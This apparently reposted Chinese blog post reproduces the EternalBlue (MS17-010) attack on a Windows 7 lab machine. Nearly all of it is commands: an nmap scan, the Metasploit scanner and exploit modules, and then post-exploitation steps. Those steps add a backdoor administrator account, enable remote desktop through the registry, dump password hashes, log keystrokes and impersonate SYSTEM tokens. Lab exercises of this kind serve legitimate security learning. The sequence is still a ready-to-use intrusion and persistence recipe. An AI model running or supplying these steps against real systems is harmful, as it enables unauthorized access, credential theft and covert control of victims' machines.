admin 管理员组文章数量: 887021
Win7经典漏洞永恒之蓝复现
- 环境
- 信息收集
- 确定漏洞
- 渗透
- 渗透成功后一些常用操作
环境
工具:metaspoilt
模拟攻击机ip:192.168.2.19
靶机ip:192.168.2.22
信息收集
扫描靶机端口及端口服务版本
nmap -sV 192.168.2.22
445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显
确定漏洞
启动metaspoilt
搜索ms17-010
search ms17-010
exploit/windows/smb/ms17_010_eternalblue 为攻击模块
auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞
进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
查看参数
show options
![在这里插入
RHOSTS参数是必填项,参数为目标ip
set RHOSTS 192.168.2.22
运行
exploit
运行结果
确定有永恒之蓝漏洞
渗透
使用ms17-010攻击模块
use exploit/windows/smb/ms17_010_eternalblue
查看参数
show options
主要参数有
RHOSTS:目标主机ip
LHOST:攻击者ip (程序检测到网卡的ip已自动填写)
LPORT:攻击接收端口(默认为4444,可根据需要更改)
set RHOSTS 192.168.2.22
开始渗透
exploit
渗透成功
渗透成功后一些常用操作
通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22
shell交互显示乱码是因为编码不同
chcp 65001
修改编码可解决
获取到session后的常用命令:
help #获取所有可用命令
getuid #获取当前权限
screenshot #截屏
hashdump #获取密码的hash
ps #获取进程列表
sysinfo #获取系统信息
route #获取路由表
getpid #获取当前攻入的进程pid
migrate #将当前后门注入迁移到其他程序
keyscan_start # 开启键盘记录
keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
download/upload #上传下载文件
keyscan_stop # 监视键盘记录
bg # 回到metasploit界面
令牌操纵
use incognito #heip incognito 查看帮助
list_tokens -u 查看可用的token
impersonate_token “伪造的身份” #假冒token 或者
举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell
版权声明:本文标题:Win7经典漏洞永恒之蓝复现 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1724500649h751847.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论